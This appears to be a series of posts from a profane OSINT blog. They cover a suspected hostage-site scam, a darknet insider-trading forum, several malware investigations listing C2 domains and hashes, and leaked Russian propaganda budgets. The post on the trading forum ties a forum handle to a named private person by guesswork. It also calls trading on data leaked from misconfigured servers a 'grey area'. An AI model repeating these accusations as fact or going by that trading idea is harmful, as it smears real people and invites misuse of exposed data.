Last week someone pointed out a story about how the Qatari government or relatives of some Qatari’s that had been kidnapped on a falcon hunt had started a darknet site and a fund in bitcoins for information on their whereabouts and return. This story intrigued me so I went looking for the site and someone on Twitter kindly pointed to it and the twitter feed with the address. I went to the site and took a look at it and then started looking at the larger picture of who the Qatari’s hired to do this as well. What follows are my thoughts on using a darknet site like this for proof of life and or transactions like this as well as the company that the Qatari’s turned to to do it for them. Of note is that this attempt was closed down as soon as the story came out in the press so that is an added twist but given the things I have seen it makes total sense why a little light on the subject would make the “company” hired by Qatar to close shop and run away.
Global Strategies Council Inc:
As reports online had mentioned, the “company” Global Strategies Council, was given 2 million dollars up front for work attempting to get proof of life for the abducted falconers. I decided to look further than the reporters (at least as much as they reported) and found some interesting things concerning this alleged company and the person(s) involved in it. First off, the company is so stealth that you have to really dig a fair bit to get to the guts of what it is. Even then, you really do not get much detail on who is in the company, who works there, and what it does exactly. The hinge seems to be on this “shoe salesman” or “Shoe Mogul” if you will, Miltos Goudamanis and no, it is not Militas as you see in the reports in the news. His real name is Miltos and he has a rather obscure past, unless you just go with the shoe angle.
Miltos is evidently the international sales guy for “Naughty Monkey” shoes, a crappy ass site that sells shoes and poorly for a number of years attached to Cyprus. Now, one lately hear Cyprus and think first off of money laundering and banks and so did I. I checked the Panama papers and he is not in there but generally everything is pretty sketch around this guy. Naughty Monkey is the most solid hit for this guy that you can backtrace, so now one has to ask how does the Greek Al Bundy get to the point of dealing with international terrorists and asking for an advance of 2 million dollars to set up darknet sites eh? That question kept ringing in my ears as I dug deeper into the inception zone.
If you look at all the data above in the screen shots you can see that this guy has no real experience with military or national affairs so how does he suddenly become a director or chair at this Global think tank? Furthermore how does a guy who makes less than 10G’s a year is getting a net of 499k?
SHOES MUST BE SELLING LIKE NO TOMORROW!
This is starting to smell like some rotting carcass in the San Diego sun….
So yeahhhh, this “company” this think tank specializing in… In what? Well, fuckall really, is being run out of this condo it seems in San Diego according to all the records I could find. In fact the phone number to the place also matches with a land line for the area. Not one thing about this company says it has offices in Washington DC at all. Even though their site makes all kinds of DC imagery and allusions to connections therein… Obliquely that is.
Saaaaaaaayyyyyyyy.. is that office condo space zoned for this kind of fuckery?
Looking at their site you have to just ask yourself after reading it all; “Is this Enron?” because they seemed not able to tell you exactly what they did either and look what happened there huh? There are no employees, no experts listed on their rolls and certainly very little on Miltos as to his history or education for these kinds of things. If I were the Qatari’s I would be asking the guy who hooked this all up what cut of that two million he got. I am just gonna lay it out here in plain language;
- Company site is poorly made and has no real data
- No employees
- No history
- Two million up front and we get proof of life!
This all screams scam and when the whole operation was shut down I think we all got the same feeling about it huh? How are the Qatari families feeling about this? Is this guy just an opportunist shoe hawker or is there more? So far as I can tell this guy has been trying for years to get USGOV work and hasn’t been able to land anything. So a little grift for a cool two million and a cheap darknet site/twitter account is easy peezy.
About that darknet site….
The idea behind this site was to allow the hostage takers a medium to connect with the alleged “middle man” Miltos, to get in touch as well as maybe open source this thing so that anyone with information could leave a tip. Now, on the face of it this may be something of use if you keep it really down low and release that information only to the hostage takers right? I mean you leave this on the darknet and then publish it in the paper you are only gonna get trolls right?
I went to the site and checked it out. It was a clone of the global leaks site (using their frame) and you could create an ID and drop information there. You could log back in and see what responses came from Miltos and his crew but when I looked there were no other info drops that I could see. I signed up and got a number just to see how it would work.
Basically this was ill thought out and deployed so once again I think fly by night and not really meant to gather real intel on the status of the poor Qatari’s who have been jacked. Of course, it is now all shut down according to the Twitter account for the “Op” so so much for gathering information of proof of life for the families of those Qatari’s huh? I will keep an eye on the site to see when it comes down but generally I suspect it will just sit there on some rented space littering the darknet for years.
Thoughts on Darknet as Medium for Ransom:
Aside from thinking that this whole thing was just a grift by this guy Militos and his wife, the notion of using a site in the darknet as a means of proof of life is iffy at best. I should think that the terrorists or whoever that took these people is not surfing the darknet in the first place and would just as easily pick up a sat-phone or regular phone and call the Qatari government with their demands. These arcane measures just isn’t their shtick man.
For that matter just use a cutout gmail account and PGP huh? What the fuck! This whole debacle is just an exercise in how to pull off a short con on a lot of families looking for answers about their lost loved ones. If I were Qatar, I would be asking this Ali Hani about his connections to this Greek guy in San Diego tootsuite man. I am sure the money is spent already anyway…
Oh and as for the hacker angle of “OOOH SCARY HACKERS IN THE DARKNET MAKE SITE” cut the shit media! Anyone with half a brain can stand up a site in the darknet so cut it the fuck out. There was nothing spectacular here other than the lede that looked good for clickbait.
Now.. About those lost Qatari’s….
I was trawling the darknet as you all know I like to do and came across a site I had seen once before and bookmarked but never got back to. The site http://b34xhb2kjf3nbuyk.onion “The Stock Insiders” is a php site that claims to be an insider trading site seeking users who will provide insider information for the collective to profit from. Now I will admit that I have been watching Billions and I am also reading “Black Edge” so this site finally struck a chord with me and I decided to mirror it and take a look inside. The following post is the sum total of what I found and some thoughts on the idea in the first place. …I am sure you all will be amused.
Right, well the darknet is supposed to be super secret and encrypted if you believe all of the reporters out there who cover it with conspiratorially raised brows. It only stands to reason that some enterprising joker would go and set up a site like this to trade in illegal insider information yes? Well obviously yes because here it is! As you can see from the screenshot above they are making no bones about it, they want to have players here who can provide solid insider information so as to make trades illegally and make oodles of money! Of course there are problems with that idea and I will be going into those here. Sure they make caveats about the legalities but they also claim that the server is not physically in the US and the whole server is “encrypted” which, ugh, come on people! Crypto is only as good as the system being shut down and the type of crypto being used.
….But I digress…
Now let’s talk about the intricacies of insider information and it’s use. You see, it is not that easy to obtain good insider information in the first place and secondly, using it has to be carried out carefully so as to not tip the SEC and other investigative bodies to your use of it to profit right? So by trying to open source this on the darknet is kinda scary in more than a few ways to my mind. I mean, who are these people? How do you vet them and their information they are passing? How do you not know you are being baited by a Fed or some moron in the first place? Then, how do you make the trades and profit without a trail and maybe even the potential for being ratted out if things go badly? I just keep coming up with all these scenarios where things go poorly from this idea. Personally, the notion of this site is half baked in my mind but hey, this could just be a honeytrap right?
Alright, let’s assume it is legit, how do you really go about this? Well, you start off by getting members and then testing them by asking for legit insider info to trade on so they will be allowed in as “full members” ya know, like becoming a made man ehhhhh? Ok, so I am say “jpompo6” (oh yeah wait till you get to the bottom of this here post!) and I want in. I have to create an account, then go through the vetting process by passing data to the “root” account (yes, I did say root!! wink wink nudge nudge!) on a sweet sweet insider stock tip and hope upon hope that I am accepted into the inner sanctum. One of two outcomes will happen:
- I wait, and I wait, and nothing happens.
- I hear back that I am a made man and HOO HA! I can then get into the inner sanctum and start reading all the juicy posts and making trades on them! WIN!
Unfortunately I had no real insider info to pass and, well, I am not an idiot so I did not go further than setting up a dummy account on this site. Instead I started looking at the site itself and gathering whatever intelligence I could to do a little OSINT on the users that I could see.
…And boy did I see things-n-stuff.
Anywho, the community has rules and those rules are listed below. I do sincerely love the first rule of INSIDER TRADING CLUB which is YOU MUST BE AN HONEST GENTLEMAN! Now that is some deep derp there kids. You are telling me that you want honest gents in this here illegal enterprise of insider trading informatics on the darknets? NO. WAY. The other rules pretty much follow the rules of Fight Club, don’t talk about Fight Club, Don’t fuck with Fight Club, yadda yadda yadda. The more I read the rules the more cognitive dissonance I have about the whole thing really. I do like the whole you have to keep reporting in new leads every 90 days in accordance with the SEC practice of 10-q reporting hahaha.
Say, is there a profit sharing plan here? How are the health benefits? Do I get a 401K here? Honestly, this whole model is good when you are in the real world and you are face to face with people you have developed a rapport with, not some shmuck who may be a Fed on the darknet kids. In reading the Black Edge book you can see how much of the intelligence is gathered on companies, usually you have paid sources or sources you do favors for quid pro quo and there is an understanding that if you fuck me you fuck yourself. The whole idea that I am just gonna take some inside info from the darknet and apply it to large trades on the market is a bit much for me to believe. Now maybe if you wanted to communicate data like this with known and trusted people in the darknet using encrypted comms maybe I would buy that but this site just seems to be to either be a honeytrap or a scam looking for suckers to put their legit inside info out there for a quick pump and dump.
But that’s just me…
So yeah, you have this site out there and you promise all the super secret DARKNET black magic. You tell people that the data is secure and then you say “But.. You have to be careful” everyone is gonna take that to heart right? Well, almost everyone… Ok some people… Ok ok ok maybe one person. In the case of this site there was a “props” page that I found that listed users who they wanted to thank. For the most part the user names were innocuous enough to not go anywhere with an OSINT search regimen. However, there was one guy who seemed to not comprehend the idea of OPSEC.
The user JPOMPO6 who is listed in the thanks page seems to really not get the whole idea of not re-using online handles. This guy seems to have used his handle for everything online on this site and “root” likes him enough to give em props. A simple Google search for the ID drops a ton of hits that show this guy to might be Joe Pompo a CPA from upstate New York. Now given that the handle is exactly the same as the Twitter handle he uses and then further more that he is a CPA, well, I kinda think this is our man but I have to say for the record and for all you lawyers out there; (I Googled some shit and this MAY BE the guy, I am not saying IT IS THE GUY but JEEBUS it really does kinda all fit) so please, don’t sue me because I made a logical leap.
That this character under the handle jpompo6 is on this site does not in fact mean that they have traded insider information at all. In fact, I cannot see any postings by this user so it is not for me to say. All I can say is that a user who has the same handle as the Twitter user and that user has the name Joe Pompo exists is, well, there you have it… If this is the same guy then oops, your OPSEC sucks and the site’s admonishments were lost on you. One wonders what other OPSEC fails there must be inside the site, ya know, like using your corporate email or your one personal email as the contact for this site.
Programming and Administration:
As if the OPSEC thing wasn’t bad enough, when the site was looked at from a security perspective things went from bad to worse. The site is leaking information, it was set up poorly and likely can be hacked if it hasn’t already. The mere fact that the root account is the one making all the posts here is scary as administrating php sites goes. However, when looking at the directory tree there was a lot left open. With all this hanging out I kinda really have my doubts about the security of the site don’t you? I personally would run away, change my name, and burn everything with my old name on it if I had traded anything of any import on this site kids.
So what have we learned today? Well, we learned that insider trading is best left to professionals and done in secret places other than the darknet I think. While the idea of insider trading is appealing to some, it is really going to fuck only you in the end when the feds come for you. Honestly, I think a better alternative is to just do OSINT and find data that has been accidentally leaked by companies and then make your trades, and as I understand it that is kinda grey area right? I mean no one told you the info, you did not pay for it, you happened upon it right? In the present day state of the internet there is so much information that is out there on mis-configured servers and the like that you could likely use that to day trade your way to riches right?
End of the day, stay away from these scam sites in the darknet kids… Unless federal prison appeals or being totally taken by fraudsters.
PS.. Props to @chkefa for the heads up on jpompo6!
I was bored again and let my fingers do the walking on ThreatCrowd with some interesting results. Did you all know that you could put words into that search engine and come up with malware hits? So, in the case of my word searches I decided to look for Arabi words that have meaning to Da’esh and the jihadi set with some interesting results. In the case of the word “jihad” I came up with the following hits:
The hits there show you the attendant hashes of malware alleged to be connected to those domains as C2’s (Command and Control) systems. When you click on them you get the Maltego maps and all of the data concerning them so you can see where everything pivots to and what other servers may be involved with it. Using this method I ran into a set of results for Balabindi, which is the same malware as seen in the recent attack on the Amaq Da’esh site that was hacked and served malware out to about 600 people (claimed) by stats from the link shortener used to propagate it.
The searches that I ran showed that there were concerted efforts with Balabindi using dynDNS sites (jihad101.no-ip.biz and others) as command and controls for the Balabindi variants used against jihadists in the past and they continue today. There is even a minecraft server (jihad.serveminecraft.net) that may also be involved as well. Of course it is funny ha ha to name these servers jihadihacker and other names to poke at the jihobbyists but it is kinda bad OPSEC really in my book. So either these are OpISIS or someone is having a bit of a joke, but the malware in the case of jihad100.no-ip.biz is just “server.exe” and basically like the rest of the samples I was seeing was a RAT, so I can see how these are just being used to pwn these jihadi’s and harvest their real data, that is if they are stupid enough to run “server.exe” on their box.
Generally I am seeing the same kinds of attacks with older off the shelf malware that may get past some old AV or work on people who have no AV at all but nothing so far has stood out as exotic so I am thinking this is the Anon’s doing their thing, or trying to… At the least it was interesting to find the function on ThreatCrowd and leverage it. I think I will plink away at it some more using Russian words next for shits and giggles.. Or.. OOOH maybe Korean huh?
I guess the last thing I would say on all of this is that the Anon’s may have had some success with these attacks and maybe passed on some info to the right people but generally I am not impressed with the op’s against Da’esh as a whole. Taking down the jihobbyist sites may be splashy for the tabloids but the reality of it is that these sites like Amaq are just for the lowest of fruit users online wanking off to jihad. Sure, some could maybe go full “lone wolf nutbag” and try something but generally the real players got off the boards years ago because they were just for skidz and wannabe’s. Most of the real shit happens in closed sites that are below the radar and of course on chat systems like Telegram and others where they can talk with some crypto and not be hassled by some poor php site that gets popped every other day and taken offline.
Threatcrowd for word jihad: https://www.threatcrowd.org/searchTwo.php?data=jihad
Threatcrowd for word ISIS: https://www.threatcrowd.org/searchTwo.php?data=ISIS
Reference=Houdini/Dinihu/Jenxcus/H-worm Reference=http://cybertracker.malwarehunterteam.com/c2/ Reference=https://bartblaze.blogspot.com/2014/02/remediate-vbs-malware.html Reference=https://otx.alienvault.com/pulse/56e2dab5aef921042823dbca/
MD5=11b45bfbbbd944ca9bf1f5f69628d055 MD5=1eb1a366dae694202235656f2f42aa9a MD5=7f209fa351a6792484fcc4d786a17ffd MD5=cd685e040b584909bd208e8fcad0c846
Remember when the news media was told by Brian Krebs that Turnip’s hotels had been hacked and their credit card data has been stolen? Well there is more to the very little story that made the press after Krebs dropped a dime on them. In looking around the ThreatCrowd today I decided to take a look at the Turnip brand and, well, they have over three thousand domains but a couple jumped out on the searches due to their being connections in some malware back in April of 2014. This coincides with the hack time frame according to the stories I have seen including the one by CNN above where not much is said by Trump nor the FBI or USSS because they were looking into it and that Turnip was a candidate for president. Given that no one has really said anything about this hack post Krebs I have to wonder just how deep these guys got in and what actor group it may have been. If it was straight up carding was it Rescator? Some other Eastern Block group? If it was Russian then, well, you know how they like to dual use these hacks right?
Well, the malware in this case was programmed to attempt to connect with the hotel psmtp server as well as the main domain. This means that they were compromised enough to used as a C2 or perhaps it was just garbage traffic as as been seen in the past with some malware creators. The real kicker is that this malware was doing it’s thing in the same time frame that the hack was alleged to have happened, so I have to think that the case here is that they did in fact use them as a C2 as well, or another actor did piggybacking on the other hacking going on.
Maybe Turnip’s security just sucked? Oh well, as you can see from the maps below they were pretty busy. The best thing for me though was the name of the file that the malware was propagating by.
(scroll down but don’t be drinking anything hot FAIR WARNING)
Trumphotels.com Domain ThreatCrowd
So that malware that had the Turnip hotel as a C2? Yeah, it was in the guise of a file called SHEMALE_MOVIE_83.MPEG.EXE I shit you not! So GoldShower’s systems were being used to pimp malware that went under the name of SHEMALE_MOVIE_83.MPEG.EXE
I do love the schadenfreude here. Evidently it was a trojan that harvested creds, listened to all traffic, and manipulated the SMTP on the system as well. I have to wonder who at Turnip Hotels may have gotten an email with this file and clicked on it. I also have to wonder if they were acutally mailing this shit out from Turnip central as they had connections to the PSMTP server as well. Say, any of you get any dirty email from Turnip back in 2014 or 2015?
As I write I have this grin on my face…
Enjoy the schadenfreude kids!
You See What Happens When I Get Bored? china.org.cn –> media.president.ir –> rodong.rep.kp —> TURLA?
So yeah, I was bored earlier and when I am bored my brain likes to take a walk down the darker hallways of the intertubes. Today I was plinking around with ThreatCrowd as is my wont, and I decided to start messing about with .gov.kp addresses. So I did a search for just .gov.kp which netted me nada. So I went back to the drawing board and looked up all the .kp addresses out there. I messed around a bit and hit rodong.rep.kp which had the nugget of the day I was looking for.
See that big purple thing? Yeaaaaaahhhh that is malware activity and a has all the hallmarks for nation state malware kids! Upon looking closer at this closer at this you can see that this piece of malware is talking to other interesting places like Iran and China! This really piqued my interest because just look at those addresses huh? Iranian mil sites, the presidents site, their news service (FARS) and china! Now what could be happening here kids? Was this malware or something else? Is the anticipation killing you yet?
Right! So I then started to circle out to the other sites on TC and of course clicked on the malware hash itself to see what the deal was here and when this all came about. To my surprise this malware and the activity happened last year in June. The malware was run privately on Hybrid on June 22nd 2016 but if you look closely at the image at the top of this piece, you see that the post is listed as December 3rd 2016? How does that work one wonders? Is this a post to the site after the original piece was uploaded? Was there something going on here that made the dates all messed up? In any case, the fact that this was posted privately to Hybrid in June shows that someone was either testing their malware or someone just found this and decided to post it privately to not trip up they had found it.
The sample itself is the php on the site (http://forum.china.org.cn/viewthread.php?tid=175697) which is not around at the moment to attempt to gather a sample directly. I also checked The Wayback Machine too and alas they did not have the site cached on the date or after where I would need to get the sample. At the time of testing this malware injected an exe (FP_AX_CAB_INSTALLER64.3×3) in temp and begins the work of pwning the system. It drops some files on the system and within the process is an IP address (22.214.171.124) which is in China.
Ok, so I pivot over to the malware 866fd7c29b0b6082c9295897d5db9e67 and whoa, look at all the malware traffic! It’s a festival out there man! Looks like someone is using a flash update to pwn all the things in Iran, China, and DPRK maybe huh? When you look at the malware C2 call outs it makes in the Hybrid analysis you can see them all. But when i start looking at the sites in the binary it is then I start to see where the other sites have bad histories and the files that seem to have been a part of the arcology.
Pattern match: “http://forum.china.org.cn/archiver/”
Pattern match: “http://www.china.org.cn/node_7077424.htm”
Pattern match: “http://forum.china.org.cn/main.php”
Pattern match: “http://126.96.36.199/uc/en_uc_admin/avatar.php?uid=248308&size=middle”
Pattern match: “http://forum.china.org.cn/viewthread.php?tid=175697&page=1#pid261371″
Pattern match: “http://www.b14643.de/Spacerockets_1/Rest_World/Simorgh-IRILV/Gallery/Simorgh.htm”
Pattern match: “http://www.jajusibo.com/imgdata/jajuilbo_com/201505/2015051137439063.jpg”
Pattern match: “http://www.jajusibo.com/serial_read.html?uid=20376§ion=sc38”
Pattern match: “http://media.president.ir/uploads/org/144022966897383700.jpg”
Pattern match: “http://media.farsnews.com/media/Uploaded/Files/Images/1394/05/31/13940531000590_PhotoI.jpg”
Pattern match: “http://static2.bornanews.ir/thumbnail/ttNMJfA47E4M/hsPvu53JYc4ZMdL-GggwrIzh2hzU5xtVFQP8bK_wEHTWBrL3vxxKeZCrWjxHgZzZ8wnBrYkXU3QMHDsygonvkmg5kwqDkuu0pz2Zr-6LSnsZsz9y7UBP4tOzeGfnkG3Doo_lkYGgn2HQLYzD7Q9EqmO9y02FRvdV2ZvL5vX-_oL5SMFaqVjbXcnvO0GLTcsXON4tIh35SxI,/”
Pattern match: “http://static2.bornanews.ir/thumbnail/SQ8qder1eiAx/hsPvu53JYc4ZMdL-GggwrIzh2hzU5xtVFQP8bK_wEHTWBrL3vxxKeZCrWjxHgZzZ8wnBrYkXU3QMHDsygonvkmg5kwqDkuu0pz2Zr-6LSnsZsz9y7UBP4tOzeGfnkG3Doo_lkYGgn2HQLYzD7Q9EqmO9y02FRvdV2ZvL5vX-_oL5SMFaqVjbXcnvO0GLTcsXON4tIh35SxI,/”
Pattern match: “http://static2.bornanews.ir/thumbnail/WoR50ZKvbOvU/hsPvu53JYc4ZMdL-GggwrIzh2hzU5xtVFQP8bK_wEHTWBrL3vxxKeZCrWjxHgZzZ8wnBrYkXU3QMHDsygonvkmg5kwqDkuu0pz2Zr-6LSnsZsz9y7UBP4tOzeGfnkG3Doo_lkYGgn2HQLYzD7Q9EqmO9y02FRvdV2ZvL5vX-_oL5SMFaqVjbXcnvO0GLTcsXON4tIh35SxI,/”
Pattern match: “http://www.president.ir/en/88795”
Pattern match: “http://i.imgur.com/0ayxQnW.png?1”
Other hits for the hash:
Threat Miner: https://www.threatminer.org/host.php?q=188.8.131.52
Threat Miner: https://www.threatminer.org/host.php?q=184.108.40.206
It gets stranger with the sites that this thing attempts to connect with as well. All of the connections are GET’s on port 80 so is this just polling sites or are some of these carriers of malware second stage? I have yet to go through all of them but one stood out already in the odd department (in red) this site came up dirty on more than one occasion and also the site resides in the US but has a guy from Iran ostensibly as owner who has a Yahoo account for an email. When you look at the site it seems to be a pro Iran mil site that kind of mirrors many of the others in Iran (think Geoshitties from hell) but why is an official site like this being hosted in the US huh?
|media.president.ir||220.127.116.11||Iran (ISLAMIC Republic Of)|
|media.farsnews.com||18.104.22.168||Iran (ISLAMIC Republic Of)|
|static2.bornanews.ir||22.214.171.124||Iran (ISLAMIC Republic Of)|
|rodong.rep.kp||126.96.36.199||Korea Democratic People’s Republic of|
|http://www.jajusibo.com||188.8.131.52||Korea Republic of|
An address inn memory though there was this little hit: bzip.org When looking at this site it has been rather naughty over time and has a high hit ratio for malware: This site also seems to be tied to APT activity.
This site has a lot of trojan activity over time so this may be the hit we are looking for. When I dug into this site I located the key piece of information that I believe nails this as Turla activity. When you look up the domain for bzip.org you get an email address attached; firstname.lastname@example.org which then turns up in the ThreatMiner report as being a C2 for Turla. So, it looks like my boredom has maybe led me to RU APT activities against CN/IR/DPRK in June of last year.
Is this in fact the case? Has anyone else seen this? I will keep plinking along but do take a look you malware mavens and see what you think.
Vice reported on the Amaq News Agency’s hack and dissemination of malware last week and the report really kind of fails to do much more than attempt to amplify the booga booga of the whole affair. I thought I would go hunt down the sample(s) of the malware and have a looksee for myself. Which is exactly what I did and located two samples of malware that are from other domains owned by the same players. What follows is a run down of those samples (I was unable to find the one mentioned in the story as of yet but did locate the VT assessment of it) and a fuller deconstruction of the domains involved.
As some of you may know, Amaq is just the news site for the dissemination of propaganda so this would be a good target for someone to go after, infect, and hopefully reap the rewards of anyone stupid enough to install the file that was being served out. Interestingly though the malware mentioned in the piece on the 30th is a flash update and the malware I located on the other attached domains is an .apk file that allegedly is for a flash update? In any event, my first impression from the Vice piece was that it was derptastic. You are going to use a 2013 rat that everyone see’s to pwn an alleged 600 click happy jihadi’s?
Right so as the Vice article says the malware was easily seen by a multitude of AV products so really, you are hitting the lowest common denominator here if they click on it and have no AV at all. Of course if you were aiming at phones that would be different but this was an executable binary so.. uhh.. Duh? Right, well the malware in the story was ostensibly just an update to Flash if what has been posted is in fact true. I went to the site listed in the shortlink and no joy on that, nothing there anymore.
After checking the domain jiko.at from the url that was serving the malware last week I began tracking down the owner data. What came from that is that the email address of email@example.com is a throw away account as far as I can tell with only three domains being registered with it. Once you look though, you can see that more domains actually had been created by the same actor using the name “dertou” as well. Those domains are ad13.de, amaqqq.xyz, baqiyy.at, and jkikkia.at.
Without going too far down the rabbit hole here I just wanted to point out that these addresses were all created on the 29th of March and deployed along with the other exploit it seems. One of the domains is still live and are serving out the malware:
Now this address would match up with the attempts at trying to get amaq users to go to a bad squatted address and this is where I got the malware I mentioned above (details below) The other domains are all interesting in that some have names that are close to such things as the Da’esh magazine “Baqiya” but others like ad13.de have nothing to do with all that and in fact ad13 is much much older a domain. Ad13 was originally created in around 2013 and was decomissioned around October 2016 with changes made to the domain in July 2016.
When I started looking up the list.ru address I hit a road block for now but I will keep poking at that because I feel that this person is one of the key players if not the key player here. Otherwise there is the usual obfuscation going on with the other addresses out there and as such I am just going to drop them for now. Instead, I will look at the malware and where that is making calls to after dumping the IOC’s on you all.
Here you go!
https://www.hybrid-analysis.com/sample/b641c03fe4334d7c0045db7db70fd7d1c8756ba5a50f35a6ec5257bd533c1630?environmentId=100 –> Malware
https://malwr.com/analysis/OTllNDU5YjNkYzVlNDFhOWI1Yzc2YWY0ZWI3NWY0N2Q/ –> Malware
https://virustotal.com/en/file/379cd2fed583c183fc1c5d1597421642f8e6b15af74ec58348e40ee80f227b25/analysis/1490880990/ —> Malware
https://www.hybrid-analysis.com/sample/b641c03fe4334d7c0045db7db70fd7d1c8756ba5a50f35a6ec5257bd533c1630?environmentId=100 –> Malware
The malware sample I got from the amaq xyz site was named FlashPlayer8x86_x64.exe and downloads as an .apk (Android) file by name obfuscation from the url. Once run it attempts to contact several domains and IP addresses for the second stage.
These addresses don’t actually have sites on them so they are just C2 and in the case of the original malware in the Vice piece there was a site with a gate.php address which may have been an IP collection point or a second stage malware install site. None of these though have the gate.php and the fact that this site is still working makes me think that perhaps this was to be the second wave of attacks had not Vice and other sources reported on the hack. Perhaps though because it is still live the hackers plan on another attempt at going back to the well no?
Overall the sites have been updated recently but have been around a while. The malware is easily detectable by AV, and the RAT is old so was this a real attempt at harvesting or was this some sort of pranksterism or PSYOP? Frankly I can see it both being semi-experienced hackers doing this or more astute actors using easily seen malware to perhaps scare users into not looking at the site anymore. That I could track it back so far to the list.ru user to me says that there may be more to this if I dig further but then I have to be that interested in who may be fucking with amaq.
The fact of the matter is Da’esh is losing ground and losing the interest of those who think they are a righteous Caliphate because they are losing ground. The attempts to garner more lone wolves and perpetuate the jihad with these guys has been too plagiaristic for me. Basically Da’esh stole AQAP’s model but carried it off with less style so once they lose Raqqa they will lose a great deal of cred online in my opinion. Perhaps then they will be less of a threat on the GWOT in that respect… Maybe not.
Anyway, yeah, these guys are soft targets and not the sharpest tools in the tool box so hacking them has never been a challenge. All these insecure PHP sites and their users are easy pickins really so this is a non story to me. It is more interesting to me who may be trying to fuck with them and to determine why exactly. Is this the IC trying to deter them or is this an OpISIS kind of thing?
I am still deciding…
Back in December I located a dump of data on the darknet placed there by a hacker collective in Ukraine called RUH8. The dump is rather good sized and all come from Russian backed Ukraine sources. RUH8’s dumped one group in particular that I was interested in because I located a piece of malware in the email spool that, once run through the usual tests, showed to be something not widely seen before. I will cover the malware further down the article and will include IOC’s but once I harvested the email spool itself and began to get things translated things got even more interesting.
Once I mirrored the site I got some help from <REDACTED> and set to work in translation of emails and documents attachments. Most of the bulk of the dump is average emails concerning daily business but a few began to tell a tale of the company that the emails came from and how it was in fact a Russian front organization created for propaganda in Ukraine and used to manipulate the populace in the Donetsk People’s Republic (The Russian separatist area of Ukraine) and those outside it including other countries outside of Ukraine.
Having all of this come to light just after the election win for Trump, and now coming out here in the midst of the Russian intervention and collusion investigations today, I thought this report would be prescient and give a rare insight into how the Russian propaganda machine works, how the intelligence apparatus of Russia works in this respect, and perhaps bring to light a new piece of malware for everyone to see.
The leak by RUH8 in the darknet consists od more than a few entities email spools as well as individuals that they have described as assets of Russia. In the case of this post the data comes from the domain dir-online.ru. This is a media org in Ukraine that is Russian backed and as I said before caters to the Donetsk People’s Republic. Within the dump there are many documents covering the day to day but five documents stood out amongst them all (frankly there are more to be analyzed and one needs Russian speakers to translate them all) as being all things shady.
RUH8 is also the group that hacked and dumped “The Grey Cardinal’s” email spool as well. Having gone through that spool I did not find any malware of merit or anything that was new so I moved on in mirroring and checking for goodies. They keep adding content to the site too so I would expect eventually I will locate some more goodies in the future. Keep an eye on the blog for more when I find it. The Grey Cardinal though is an interesting figure and I recommend you all read up on him as well.
THE PROPAGANDA PLAN:
Right, well on to the good stuff! The following documents found in this dump show Russia’s machinations at propaganda in Ukraine, well, at least this small slice of it.
From Translator: This talks about “anti-Russian hysteria” in the media and about disinformation and fake news that makes Russia look bad. And also that pro-Russian voices are accused of being agents of the Kremlin. To counter this, this document outlines a project to create a pro-Kremlin media campaign in the Ukraine that includes a budget for hiring journalists and buying equipment like computers and voice recorders, a budget for freelancers and “insiders”, Website hosting, web administrators, editors, advertising, The amounts — which are, for some reason, in US Dollars, are $9,250 for initial set-up expenses, and $38,280 ongoing costs. Those could be monthly costs — the salary of a full-time journalist is listed at $2,000, and that’s likely to be $2,000 a month. The editor in chief, who’ll be based in Kiev, will get $2,500 a month. Hey, their freelance budget is $6,000 a month!
From Translator: is a little disturbing, since it outlines how the anti-war movement in the Ukraine can be used for pro-Russian purposes. For example, the idea is to create a picture of the leaders in Kremlin as corrupt power-grabbers who are using the war in eastern Ukraine to distract everyone from their own problems. Russia’s invasion of eastern Ukraine is just misformation from Kiev. Sounds totally legit.
Oh, and I figure out why it’s all in US Dollars. Hah, this is funny. Way back when I was based in Russia — something like 20 years ago, when the Soviet Union had just collapsed, inflation was rampant. Stores had to change the prices on all their products several times a day! To deal with it, they all switched to using Dollars or Euros instead, the traitors! To fix the problem, instead of fixing the economy, the Russian government outlawed the use of foreign currencies on prices. So what the stores did was switch to using something called the “arbitrary unit” — which just happened to be worth as much as the dollar, by pure coincidence. Ever since then, this “arbitrary unit” has been the default price. It particularly convenient during inflationary periods, or when dealing with local currencies in different republics. Plus, everyone knows what it means. So, in this document, they use the term “arbitrary unit” and in others, they seem to have just used the dollar symbol instead.
Also, I can confirm that the ongoing expenses are per month — they spelled that out in this budget.
So anyway, this is another juicy document. They’ve put together a budget for running a fake anti-war grassroots organization.
Initial costs are $79,200 for things like computer equipment, recruiting, registering domain names and getting business and media licenses, and website design. It’s interesting that in both this budget and the previous one I looked at, they’re careful to get all the permits and licenses in place. They might be trying to undermine the government of a foreign country, but at least they’ve got all their paperwork in order!
Then the ongoing expenses are $86,000 and include salaries for regular contributors and freelancers, salaries for editorial managers and copyeditors, a financial manager and their deputy, $2,000 for a lawyer, $20,000 for online advertising, and $10,000 for promotion on social media like Facebook and VKontakte (Russia’s LinkedIn).
They’re expecting 100,000 unique visitors a day on weekdays.
It’s interesting they note that they’ll be playing games with the tax status of their employees — like in the U.S., there’s a difference between paying people as staff (where the employer has to pay a chunk of the taxes) and as freelancers (where the poor schmuck has to pay for everything). Also, in Ukraine, folks living in the disputed territories don’t have to pay taxes. They’re saying that they can save 40% as a result of playing around with this, which they claim is common practice in the Ukraine.
So not only are they undermining a foreign government, but trying to avoid paying taxes while they do it! I don’t know which is worse.
Document docxk7EDEjG06i is a plan for creating a major national media outlet from scratch. It will take $347,640 in startup costs, and about $146,500 a month in ongoing expensies. Total costs, for an eight-month period, are $3.82 million, including advertising costs, and other related expenses. Again, they’re playing around with the taxes. And they’re expecting to get a quarter million visitors a day on weekdays.
This one also has a budget for protection against DDOS attacks. They estimate that this will cost $2,000 a month (including the site hosting itself).
They also plan to sell advertising here, and have an ad sales department, and the editor in chief’s salary will be $10,000 a month plus a share of the ad revenues.
That’s not too shabby… Then they’ve got some projections for costs and revenues after that first eight-month period, which is interesting for those of our readers who plan to launch an online magazine in the Ukraine…
From Translator: This is super evil. I’m really impressed! The idea is is to create a pro-European, anti-Russian website — with the underlying message that the Ukraine will be better off without those annoying eastern provinces, and let Russia have them, so that it can enjoy its wonderful European future without them dragging the country down. So, again, they have an editorial budget. $69,900 in setup expenses, $65,000 a month in ongoing expenses, and plans to reach 100,000 readers a day on weekdays.
From Translator: This is a plan to create a news site to cover the conflict in the disputed territories, because people are hungry for war news. The idea is to make it seem objective and independent, but slip in a pro-Russian point of view. So they’ll use terms associated with anti-Russian reporting, but slant the coverage to make Ukraine look bad. Yicch. Startup expenses: $97,200, ongoing expenses: $126,500 per month, expected audience: 120,000 unique visitors a day during weekdays.
From Translator: This is an analysis of the Ukrainian political system and how a lot of work is done by “shadow” organizations in government. There don’t seem to be any action items here.
